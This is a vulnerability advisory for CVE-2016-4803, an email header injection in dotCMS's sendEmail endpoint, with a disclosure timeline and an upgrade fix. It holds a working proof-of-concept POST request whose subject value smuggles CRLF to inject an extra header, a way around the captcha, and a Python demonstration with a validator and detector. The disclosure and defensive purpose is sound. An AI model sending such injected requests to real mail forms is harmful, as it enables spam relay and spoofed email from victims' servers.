dotCMS Email Header Injection
Posted May 25, 2016
Authored by Elar Lang

dotCMS versions prior to 3.5 and 3.3.2 suffer from an email header injection vulnerability.

tags | exploit
advisories | CVE-2016-4803
SHA-256 | 8a2aa086022ce89bb40306dc783a8bd835f0e4f8c1d80ad34fa487953fa9ea7b

Title: CVE-2016-4803 dotCMS - Email Header Injection
Credit: Elar Lang / https://security.elarlang.eu
Vulnerability: Email Header Injection
Vulnerable version: before 3.5 / 3.3.2
CVE: CVE-2016-4803
Vendor: dotCMS (http://dotcms.com/)


# Description
dotCMS exposes email sending functionality at the path /dotCMS/sendEmail/.
Some of its request parameters are vulnerable to Email Header Injection.


# Preconditions
There is no pre-condition on authentication or on authorization to
access this functionality.

If a captcha is required for the web page, then the only precondition
is the captcha. However, the captcha is renewed only when the captcha
image is requested; in other words, it can be loaded once and the
correct value set manually. After that step the "captcha effect" is bypassed.


# Proof-of-Concept
The Proof-of-Concept was made on the dotCMS demo site, running dotCMS
version 3.2.1, on 7 December 2015.

## Value for subject (%0D%0A is for \r\n):
subject=subject%0D%0AX-PoC-of-New-Line%3A+True


## Proof-of-Concept POST request:
```http
POST /dotCMS/sendEmail HTTP/1.1
Host: demo2.dotcms.com
...
Cookie: _JSESSIONID=998ADA19C99505E75DC6D27A5E84D...; ...
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 218

from=myemail&to=youremail&subject=subject%0D%0AX-PoC-of-New-Line%3A+True&returnUrl=%2F1&invalidCaptchaReturnUrl=%2F2&useCaptcha=true&captcha=hwxc5&comments=some+content&send=Send
```


## Received email source:
```text
Message-ID: <1894336506.1449476889789.JavaMail.dotcms@democms1.dotcms.net>
From: myemail
To: youremail
Subject: subject
X-PoC-of-New-Line: True
MIME-Version: 1.0
Content-Type: multipart/alternative;
boundary="----=_Part_4_698773753.1449476889786"
X-RecipientId: null
Date: Mon, 7 Dec 2015 03:28:09 -0500 (EST)

------=_Part_4_698773753.1449476889786
Content-Type: text/plain; charset=us-ascii
Content-Transfer-Encoding: 7bit

... removed ...
```


## Result

From the received email source it is visible that the single subject value
produced 2 different header lines:
```text
Subject: subject
X-PoC-of-New-Line: True
```

Proof-of-Concept on how to send a multipart email with an attachment
and a more detailed description is available at:
https://security.elarlang.eu/cve-2016-4803-dotcms-email-header-injection-vulnerability-full-disclosure.html
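The following Python script is an added illustration of the mechanism shown in the Result section and of the check a fix needs; it is not code from the advisory or from dotCMS. It rebuilds the header block the way a vulnerable sender would (plain string concatenation of a user-supplied subject), shows the PoC subject value splitting into two header lines, and then applies the control a fixed sender should have: reject any header value containing CR, LF or NUL. A third function performs the same check over a raw form body, the kind of test a request filter or log review can apply to /dotCMS/sendEmail traffic. The request body and the sender functions are constructed for the example; only the parameter shape follows the advisory's PoC.

```python
from urllib.parse import parse_qs

# Constructed form body in the shape of the advisory's PoC request.
# "%0D%0A" decodes to "\r\n", which is what makes the subject span two header lines.
POC_BODY = (
    "from=myemail&to=youremail"
    "&subject=subject%0D%0AX-PoC-of-New-Line%3A+True"
    "&comments=some+content&send=Send"
)


class HeaderInjection(ValueError):
    """Raised when a user-supplied value would start a new header line."""


def naive_headers(from_addr: str, to_addr: str, subject: str) -> str:
    """How a vulnerable sender builds headers: raw concatenation, no validation.

    Any CR/LF inside 'subject' is emitted verbatim, so the receiving MTA and
    mail client parse whatever follows it as additional headers.
    """
    return f"From: {from_addr}\r\nTo: {to_addr}\r\nSubject: {subject}\r\n"


def header_lines(raw_headers: str) -> list:
    """Split a header block into the lines a mail parser would see."""
    return [line for line in raw_headers.split("\r\n") if line]


def safe_header_value(name: str, value: str) -> str:
    """Validate a single header value: CR, LF and NUL are never legitimate here.

    Rejecting (rather than silently stripping) keeps the failure visible to
    the caller and to logs; stripping would also be acceptable if the
    application prefers to degrade gracefully.
    """
    if any(ch in value for ch in ("\r", "\n", "\0")):
        raise HeaderInjection(f"{name}: CR/LF/NUL not allowed in header value")
    return value


def safe_headers(from_addr: str, to_addr: str, subject: str) -> str:
    """Hardened counterpart of naive_headers: every user value is validated."""
    return (
        f"From: {safe_header_value('From', from_addr)}\r\n"
        f"To: {safe_header_value('To', to_addr)}\r\n"
        f"Subject: {safe_header_value('Subject', subject)}\r\n"
    )


def find_crlf_params(form_body: str) -> list:
    """Return the names of form parameters whose decoded value contains CR or LF.

    Useful as a request-filter rule or when reviewing captured POST bodies:
    a legitimate subject or address never needs a line break.
    """
    params = parse_qs(form_body, keep_blank_values=True)
    return sorted(
        name
        for name, values in params.items()
        if any("\r" in v or "\n" in v for v in values)
    )


if __name__ == "__main__":
    fields = {k: v[0] for k, v in parse_qs(POC_BODY).items()}
    for line in header_lines(naive_headers(fields["from"], fields["to"], fields["subject"])):
        print("vulnerable sender emitted:", line)
    try:
        safe_headers(fields["from"], fields["to"], fields["subject"])
    except HeaderInjection as exc:
        print("hardened sender rejected:", exc)
    print("parameters carrying CR/LF:", find_crlf_params(POC_BODY))
```

Running the script prints the four header lines the vulnerable sender emits (the injected `X-PoC-of-New-Line: True` among them), the rejection raised by the hardened sender, and `['subject']` from the body check. Modern mail libraries carry the same control: Python's `email.message.EmailMessage` with its default policy raises `ValueError` when a header value contains a line break, so building the message through such an API rather than by string concatenation removes this bug class.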


# Vulnerability Disclosure Timeline

2015-12-04 .. 07 | me | detected the vulnerability, wrote the Proof-of-Concept
2015-12-07 | me > dotCMS | sent a letter with a detailed description of
the email header injection and some related vulnerabilities
2015-12-14 | me > dotCMS | sent another letter with SQL injection
vulnerabilities and asked for feedback about the "email header injection"
vulnerabilities
2015-12-14 | dotCMS > me | they were going to review my emails and
asked me to resend the "email header injection" description
2015-12-14 | me > dotCMS | I resent the "email header injection" description
2015-12-14 | dotCMS > me | they were planning fixes in an upcoming
release, estimated for the beginning of 2016. They thanked me and wrote
"security is something we take seriously"

2016-04-07 | me > dotCMS | 5 months since the first report, what is the
situation with the reported vulnerabilities?
2016-04-07 | dotCMS | commit in GitHub | "fixes #8840 sort by
sanitizing and email header injection #8841"
2016-04-07 | dotCMS > me | email header injection will be fixed in
3.5, which is estimated to be out in mid-April

2016-04-19 | dotCMS | dotCMS version 3.5 release
2016-05-09 | me > dotCMS | asked for confirmation and the version numbers
of the fixes for the CVE and the Full Disclosure
2016-05-10 | dotCMS > me | email header injection is fixed in versions
3.5 and 3.3.2.
2016-05-10 | dotCMS | dotCMS version 3.3.2 release
2016-05-24 | me | Full Disclosure on security.elarlang.eu


# Fixes
Update dotCMS to at least version 3.5 or 3.3.2.

https://dotcms.com/docs/latest/change-log#release-3.5
https://dotcms.com/docs/latest/change-log#release-3.3.2

--
Elar Lang
Blog @ https://security.elarlang.eu
Pentester, lecturer @ http://www.clarifiedsecurity.com
